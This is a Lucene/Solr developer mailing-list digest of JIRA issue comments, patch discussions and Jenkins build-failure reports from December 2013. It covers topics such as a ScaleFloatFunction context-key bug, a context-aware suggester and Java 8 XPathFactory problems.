[jira] [Commented] (LUCENE-5271) A slightly more accurate SloppyMath distance

2013-12-02 Thread Ryan Ernst (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-5271?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837432#comment-13837432
 ] 

Ryan Ernst commented on LUCENE-5271:


Thanks for the patch, Gilad.  A couple of comments:
* If the lat/lon values are large, then the index would be out of bounds for 
the table.  Today it will not error.  Since these are just doubles being passed 
in, I think it should still work?
* Why was this test removed? {{assertEquals(314.40338, haversin(1, 2, 3, 4), 
10e-5);}}
* Could you move the {{2 * radius}} computation into the table?
* I know this is an already existing problem, but could you move the division 
by 2 from h1/h2 to h?

> A slightly more accurate SloppyMath distance
> 
>
> Key: LUCENE-5271
> URL: https://issues.apache.org/jira/browse/LUCENE-5271
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/other
>Reporter: Gilad Barkai
>Priority: Minor
> Attachments: LUCENE-5271.patch, LUCENE-5271.patch
>
>
> SloppyMath, introduced in LUCENE-5258, uses the earth's average ellipsoid 
> radius (according to WGS84) as an approximation for computing the "spherical" 
> distance (the TO_KILOMETERS constant).
> While this is pretty accurate for long distances (latitude-wise), it may 
> introduce small errors when computing distances close to the equator 
> (as the earth's radius there is larger than the average).
> A more accurate approximation would take the average earth radius at the 
> source and destination points. But computing the ellipsoid radius at an 
> arbitrary point is an expensive function, and this distance is meant to be 
> used in a scoring function. So two optimizations are possible:
> * Pre-compute a table with an earth radius per latitude (the longitude does 
> not affect the radius); a rough sketch of this idea follows below.
> * Instead of averaging the radius at the two points, figure out the average 
> latitude (exactly midway between the src and dst points) and use its radius.
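
A rough sketch of the table idea (an editorial illustration, not the attached 
patch; the per-degree resolution and the midpoint rounding/clamping are assumed 
choices):

{code:java}
// Sketch only: precompute the WGS84 geocentric radius per whole degree of
// latitude; longitude does not affect the radius.
public final class EarthRadiusTable {
  private static final double A = 6378.137;     // WGS84 equatorial radius (km)
  private static final double B = 6356.7523142; // WGS84 polar radius (km)
  private static final double[] RADIUS = new double[91]; // degrees 0..90

  static {
    for (int deg = 0; deg <= 90; deg++) {
      double phi = Math.toRadians(deg);
      double c = A * Math.cos(phi), s = B * Math.sin(phi);
      // geocentric radius of the ellipsoid at latitude phi
      RADIUS[deg] = Math.sqrt((A * A * c * c + B * B * s * s) / (c * c + s * s));
    }
  }

  /** Radius (km) at the latitude midway between two points; clamps the index
   *  so out-of-range latitudes cannot overflow the table. */
  public static double radiusAt(double lat1, double lat2) {
    long deg = Math.abs(Math.round((lat1 + lat2) / 2));
    return RADIUS[(int) Math.min(90L, deg)];
  }
}
{code}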






[JENKINS] Lucene-Solr-trunk-Windows (32bit/jdk1.7.0_45) - Build # 3532 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Windows/3532/
Java: 32bit/jdk1.7.0_45 -client -XX:+UseParallelGC

All tests passed

Build Log:
[...truncated 50540 lines...]
BUILD FAILED
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\build.xml:420: The 
following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\build.xml:359: The 
following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\extra-targets.xml:87: 
The following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\extra-targets.xml:158:
 Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 114 minutes 54 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.7.0_45 -client -XX:+UseParallelGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure




[jira] [Updated] (SOLR-5502) A "/" in the ID itself throws an ArrayIndexOutOfBoundsException when using the composite id router

2013-12-02 Thread Anshum Gupta (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5502?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Anshum Gupta updated SOLR-5502:
---

Attachment: SOLR-5502.patch

Patch with a one-liner test. 
The test tries to add a doc with a "/" in the id and fails without the patch; 
a minimal reproduction sketch follows below.
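
Roughly like this (the server URL, collection, and id values are placeholders, 
not from the patch):

{code:java}
import org.apache.solr.client.solrj.SolrServer;
import org.apache.solr.client.solrj.impl.HttpSolrServer;
import org.apache.solr.common.SolrInputDocument;

public class SlashIdRepro {
  public static void main(String[] args) throws Exception {
    SolrServer server = new HttpSolrServer("http://localhost:8983/solr/collection1");
    SolrInputDocument doc = new SolrInputDocument();
    // a "/" in the id part of a composite id ("shardKey!id") trips the router
    doc.addField("id", "shardKey!some/id");
    server.add(doc); // throws ArrayIndexOutOfBoundsException without the patch
    server.commit();
  }
}
{code}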

> A "/" in the ID itself throws an ArrayIndexOutOfBoundsException when using 
> the composite id router
> --
>
> Key: SOLR-5502
> URL: https://issues.apache.org/jira/browse/SOLR-5502
> Project: Solr
>  Issue Type: Bug
>  Components: SolrCloud
>Affects Versions: 4.6
>Reporter: Anshum Gupta
> Attachments: SOLR-5502.patch, SOLR-5502.patch
>
>
> While using the composite-id router, if the routing-id contains a "/" in the 
> id part, the code throws an ArrayIndexOutOfBoundsException.






[jira] [Commented] (LUCENE-5350) Add Context Aware Suggester

2013-12-02 Thread Areek Zillur (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-5350?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837405#comment-13837405
 ] 

Areek Zillur commented on LUCENE-5350:
--

Thanks for the feedback!
[~mikemccand]: I was wondering the same thing as I was implementing it. 
Intuitively I think this should be more compact than the N-suggester approach, 
but I think it's best to benchmark it against N separate suggesters (will 
update with the benchmark results). I also had another idea: implement this by 
'filtering' the suggestions by contexts supplied at query time, rather than 
prefixing the analyzed form with the context (a rough sketch of the prefix 
variant follows below). I will play around with both and benchmark them to see 
whether this would be useful in practice.
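
The prefix variant, roughly (illustrative names only, not from the patch):

{code:java}
// Sketch: put the context in front of the analyzed form so every context
// occupies its own region of the suggester's key space.
public final class ContextKeys {
  // separator chosen so it cannot occur inside a context value
  private static final char SEP = '\u001f';

  public static String key(String context, String analyzedForm) {
    return context + SEP + analyzedForm;
  }

  public static void main(String[] args) {
    // a lookup for context "palo-alto" uses the prefix "palo-alto" + SEP
    System.out.println(key("palo-alto", "restaurants"));
  }
}
{code}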
[~ppujari]: Can you expand on the deep learning algorithm part? 

> Add Context Aware Suggester
> ---
>
> Key: LUCENE-5350
> URL: https://issues.apache.org/jira/browse/LUCENE-5350
> Project: Lucene - Core
>  Issue Type: New Feature
>  Components: core/search
>Reporter: Areek Zillur
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5350.patch
>
>
> It would be nice to have a Context Aware Suggester (i.e. a suggester that 
> could return suggestions depending on some specified context(s)).
> Use-cases: 
>   - location-based suggestions:
>   -- returns suggestions which 'match' the context of a particular area
>   --- suggest restaurants names which are in Palo Alto (context -> 
> Palo Alto)
>   - category-based suggestions:
>   -- returns suggestions for items that are only in certain 
> categories/genres (contexts)
>   --- suggest movies that are of the genre sci-fi and adventure 
> (context -> [sci-fi, adventure])






[jira] [Commented] (SOLR-5505) LoggingInfoStream not usable in a multi-core setup

2013-12-02 Thread Ryan Ernst (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5505?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837389#comment-13837389
 ] 

Ryan Ernst commented on SOLR-5505:
--

Thanks for the patch, Shikhar.  A couple of thoughts:
* This forces anyone trying to use the LoggingInfoStream to provide a 
loggerName in solrconfig.  Could the LIS constructor instead continue using the 
local logger if null is passed in?  Or have an alternate zero-argument 
constructor?  This way the log4j.properties settings under 
solr/example/resources are still relevant.
* You should also update the example solrconfig.xml to include info about the 
new setting.
* Could you make the simple case better, where there is only a single log file, 
by adding a prefix option to LIS and adding the core name?  (See the sketch 
after this list.)
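
One way to do the prefix idea, as a sketch against Lucene's InfoStream API 
(this class is hypothetical, not part of the patch):

{code:java}
import java.io.IOException;
import org.apache.lucene.util.InfoStream;

// Hypothetical sketch: wrap any InfoStream and prepend a prefix (e.g. the
// core name) to every message, so multi-core output stays distinguishable.
public class PrefixingInfoStream extends InfoStream {
  private final InfoStream delegate;
  private final String prefix;

  public PrefixingInfoStream(InfoStream delegate, String prefix) {
    this.delegate = delegate;
    this.prefix = prefix;
  }

  @Override
  public void message(String component, String message) {
    delegate.message(component, "[" + prefix + "] " + message);
  }

  @Override
  public boolean isEnabled(String component) {
    return delegate.isEnabled(component);
  }

  @Override
  public void close() throws IOException {
    delegate.close();
  }
}
{code}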

> LoggingInfoStream not usable in a multi-core setup
> -
>
> Key: SOLR-5505
> URL: https://issues.apache.org/jira/browse/SOLR-5505
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Shikhar Bhushan
> Attachments: SOLR-5505.patch
>
>
> {{LoggingInfoStream}} that was introduced in SOLR-4977 does not log any core 
> context.
> Previously this was possible by encoding this into the infoStream's file path.
> This means in a multi-core setup it is very hard to distinguish between the 
> infoStream messages for different cores.
> {{LoggingInfoStream}} should be automatically configured to prepend the core 
> name to log messages.






[jira] [Commented] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Ryan Ernst (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-5355?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837381#comment-13837381
 ] 

Ryan Ernst commented on LUCENE-5355:


Did you mean to leave a commented-out echo?
+1 otherwise.

> Add more support to validate the -Dbootclasspath given for javadocs generate
> 
>
> Key: LUCENE-5355
> URL: https://issues.apache.org/jira/browse/LUCENE-5355
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: general/build
>Affects Versions: 4.6
> Environment: MacOSX AppleJDK6
>Reporter: Uwe Schindler
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5355.patch
>
>
> When Simon created the nice-looking javadocs for LuSolr 4.6, he just 
> copy-pasted the command line from 
> http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs
> Unfortunately this does not work with AppleJDK6, because it has no rt.jar! 
> The rt.jar file is in a completely different directory and is named 
> classes.jar. I had a similar problem when I wanted to regenerate the Javadocs 
> on my Linux box, but specified {{-Dbootclasspath}} with shell specials (e.g., 
> {{~}} for the home dir).
> This patch will assist the user and will "validate" the given bootclasspath, 
> so that it points to a JAR file that actually contains the runtime. Also, to 
> make life easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to 
> the JDK home folder (same as JAVA_HOME) and Ant will figure out whether it is 
> Apple or Oracle or maybe only a JRE.
> In the meantime, I regenerated the 4.6 Javadocs with the correct bootclasspath.






[JENKINS] Lucene-Solr-trunk-Linux (64bit/jdk1.7.0_45) - Build # 8552 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8552/
Java: 64bit/jdk1.7.0_45 -XX:-UseCompressedOops -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 57571 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:359: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:87: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:158: 
Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 67 minutes 19 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0_45 -XX:-UseCompressedOops -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure




[jira] [Commented] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Ryan Ernst (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837368#comment-13837368
 ] 

Ryan Ernst commented on SOLR-5524:
--

Is there really a reason the key needs to be an object?  Why not just a string 
like "scaleInfo"?

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
> Attachments: SOLR-5524.patch
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)






[jira] [Updated] (LUCENE-4381) support unicode 6.2

2013-12-02 Thread Robert Muir (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-4381?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Robert Muir updated LUCENE-4381:


Attachment: LUCENE-4381.patch

Here's a cleaned-up patch. I think it's ready.

Our ICU is currently really out of date, and upgrading it allows us to delete a 
bunch of custom code.

> support unicode 6.2
> ---
>
> Key: LUCENE-4381
> URL: https://issues.apache.org/jira/browse/LUCENE-4381
> Project: Lucene - Core
>  Issue Type: Task
>  Components: modules/analysis
>Reporter: Robert Muir
> Fix For: 4.7
>
> Attachments: LUCENE-4381.patch, LUCENE-4381.patch
>
>
> ICU will release a new version in about a month.
> They have a version for testing 
> (http://site.icu-project.org/download/milestone) already out with some 
> interesting features, e.g. dictionary-based CJK segmentation.
> This issue is just to test it out/integrate the new stuff/etc. We should try 
> out the automation Steve did as well.






[jira] [Updated] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Trey Grainger updated SOLR-5524:


Attachment: SOLR-5524.patch

Simple patch.  It just changes ScaleFloatFunction to use itself as the key 
instead of the ValueSource it uses internally (its first parameter).  This 
seems consistent with how other ValueSources (such as QueryValueSource) work, 
and it fixes the issue at hand.

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
> Attachments: SOLR-5524.patch
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)






[jira] [Commented] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837319#comment-13837319
 ] 

Trey Grainger commented on SOLR-5524:
-

I just debugged the code and uncovered the problem.  There is a Map (called 
context) that is passed through to each value source to store intermediate 
state, and both the query and scale functions are passing the ValueSource for 
the query function in as the KEY to this Map (as opposed to using some 
composite key that makes sense in the current context).  Essentially, these 
lines are overwriting each other:

Inside ScaleFloatFunction: context.put(this.source, scaleInfo); // this.source 
refers to the QueryValueSource, and scaleInfo refers to a ScaleInfo object
Inside QueryValueSource: context.put(this, w); // this refers to the same 
QueryValueSource from above, and w refers to a Weight object

As such, when the ScaleFloatFunction later goes to read the ScaleInfo from the 
context Map, it unexpectedly pulls the Weight object out instead, and thus the 
invalid cast exception occurs.  The no-op multiplication works because it puts 
a "different" ValueSource between the query and the ScaleFloatFunction, such 
that this.source (in ScaleFloatFunction) != this (in QueryValueSource). The 
sketch below demonstrates the collision.
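
A tiny standalone demo of the overwrite (a plain HashMap standing in for the 
real context Map):

{code:java}
import java.util.HashMap;
import java.util.Map;

// Demo of the collision: two components sharing one context map and using
// the same object as the key silently overwrite each other's state.
public class ContextKeyCollision {
  public static void main(String[] args) {
    Map<Object, Object> context = new HashMap<Object, Object>();
    Object queryValueSource = new Object(); // stands in for the QueryValueSource

    // ScaleFloatFunction stores its ScaleInfo under the wrapped source...
    context.put(queryValueSource, "ScaleInfo");
    // ...then QueryValueSource stores its Weight under the very same key:
    context.put(queryValueSource, "Weight");

    // ScaleFloatFunction later reads back a Weight where it expects a
    // ScaleInfo, which is the ClassCastException reported in this issue.
    System.out.println(context.get(queryValueSource)); // prints "Weight"
  }
}
{code}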

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)






[jira] [Created] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)
Trey Grainger created SOLR-5524:
---

 Summary: Exception when using Query Function inside Scale Function
 Key: SOLR-5524
 URL: https://issues.apache.org/jira/browse/SOLR-5524
 Project: Solr
  Issue Type: Bug
Affects Versions: 4.6
Reporter: Trey Grainger
Priority: Minor
 Fix For: 4.7


If you try to use the query function inside the scale function, it throws the 
following exception:
org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo

Here is an example request that invokes this:
http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)






[JENKINS] Lucene-Solr-trunk-Linux (64bit/jdk1.7.0_45) - Build # 8551 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8551/
Java: 64bit/jdk1.7.0_45 -XX:+UseCompressedOops -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 57492 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:359: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:87: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:158: 
Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 67 minutes 18 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0_45 -XX:+UseCompressedOops -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure




[jira] [Resolved] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread Erick Erickson (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5522?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5522.
--

   Resolution: Fixed
Fix Version/s: 4.7

I pulled all the code out, so there's no longer a handler for updating config 
files in 4.x. There is one in trunk, but a blocker issue is also there to 
remind us to deal with security properly.

> Pull modifying the Solr config documents out of Solr 4.x
> 
>
> Key: SOLR-5522
> URL: https://issues.apache.org/jira/browse/SOLR-5522
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 4.7
>
>
> Follow up on SOLR-5518 and SOLR-5287. We need to add proper security to the 
> ability to write config files to Solr or there is a security problem.






[jira] [Resolved] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Erick Erickson (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5287.
--

Resolution: Fixed

Pulled out of 4.x, and put in its own handler for 5.0

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit






[jira] [Commented] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5522?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837295#comment-13837295
 ] 

ASF subversion and git services commented on SOLR-5522:
---

Commit 1547270 from [~erickoerickson] in branch 'dev/branches/branch_4x'
[ https://svn.apache.org/r1547270 ]

SOLR-5522: Pull modifying the Solr config documents out of Solr 4.x

> Pull modifying the Solr config documents out of Solr 4.x
> 
>
> Key: SOLR-5522
> URL: https://issues.apache.org/jira/browse/SOLR-5522
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
>
> Follow up on SOLR-5518 and SOLR-5287. We need to add proper security to the 
> ability to write config files to Solr or there is a security problem.






Re: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8549 - Still Failing!

2013-12-02 Thread Wolfgang Hoschek
Looks like Java's service loader lookup impl has become more strict in Java 8. 
This issue on Java 8 is kind of unfortunate, because morphlines and solr-mr 
don't actually use JAXP at all. 

For the time being it might be best to disable testing on Java 8 for this 
contrib, in order to get a stable build and make progress on other issues.

A couple of options come to mind for dealing with this longer term:

1) Remove the dependency on cdk-morphlines-saxon (which pulls in the saxon jar)

or 

2) Replace all Solr calls to JAXP XPathFactory.newInstance() with a little 
helper that first tries to use one of a list of well known XPathFactory 
subclasses, and only if that fails falls back to the generic 
XPathFactory.newInstance(). E.g. use something like 

XPathFactory.newInstance(XPathFactory.DEFAULT_OBJECT_MODEL_URI,
"com.sun.org.apache.xpath.internal.jaxp.XPathFactoryImpl", 
ClassLoader.getSystemClassLoader());

There are 14 such XPathFactory.newInstance() calls in the Solr codebase.

or 

3) Somehow remove the META-INF/services/javax.xml.xpath.XPathFactory file from 
the saxon jar (this is what's causing this, and we don't need that file, but 
it's not clear how to remove it, realistically)

Approach 2) might be best.
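
A sketch of that helper (the class name and the candidate list are 
placeholders):

import javax.xml.xpath.XPathFactory;
import javax.xml.xpath.XPathFactoryConfigurationException;

// Sketch of the option-2 helper: try well-known implementations first,
// fall back to the generic service-loader lookup only if none is available.
public final class SafeXPathFactory {
  private static final String[] KNOWN_IMPLS = {
    "com.sun.org.apache.xpath.internal.jaxp.XPathFactoryImpl",
  };

  private SafeXPathFactory() {}

  public static XPathFactory newInstance() {
    for (String impl : KNOWN_IMPLS) {
      try {
        return XPathFactory.newInstance(XPathFactory.DEFAULT_OBJECT_MODEL_URI,
            impl, ClassLoader.getSystemClassLoader());
      } catch (XPathFactoryConfigurationException e) {
        // this implementation is not available in the running JVM; try the next
      }
    }
    return XPathFactory.newInstance(); // generic service-loader lookup
  }
}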

Thoughts?
Wolfgang.

On Dec 2, 2013, at 4:41 PM, Mark Miller wrote:

> Uwe mentioned this in IRC - I guess Saxon doesn’t play nice with java 8.
> 
> http://stackoverflow.com/questions/7914915/syntax-error-in-javax-xml-xpath-xpathfactory-provider-configuration-file-of-saxo
> 
> - Mark
> 
> On Dec 2, 2013, at 7:06 PM, Policeman Jenkins Server  
> wrote:
> 
>> Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8549/
>> Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
>> 
>> 3 tests failed.
>> FAILED:  
>> junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest
>> 
>> Error Message:
>> 1 thread leaked from SUITE scope at 
>> org.apache.solr.hadoop.MorphlineReducerTest: 1) Thread[id=17, 
>> name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] 
>> at sun.misc.Unsafe.park(Native Method) at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)   
>>   at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>  at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>  at 
>> java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277) 
>> at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>> 
>> Stack Trace:
>> com.carrotsearch.randomizedtesting.ThreadLeakError: 1 thread leaked from 
>> SUITE scope at org.apache.solr.hadoop.MorphlineReducerTest: 
>>   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest]
>>at sun.misc.Unsafe.park(Native Method)
>>at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
>>at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>>  at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)
>> 
>> 
>> FAILED:  
>> junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest
>> 
>> Error Message:
>> There are still zombie threads that couldn't be terminated:1) 
>> Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest] at sun.misc.Unsafe.park(Native 
>> Method) at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)   
>>   at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>  at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>  at 
>> java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277) 
>> at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>> 
>> Stack Trace:
>> com.carrotsearch.randomizedtesting.ThreadLeakError: There are still zombie 
>> threads that couldn't be terminated:
>>   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest]
>>at sun.misc.Unsafe.park(Native Method)
>>at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
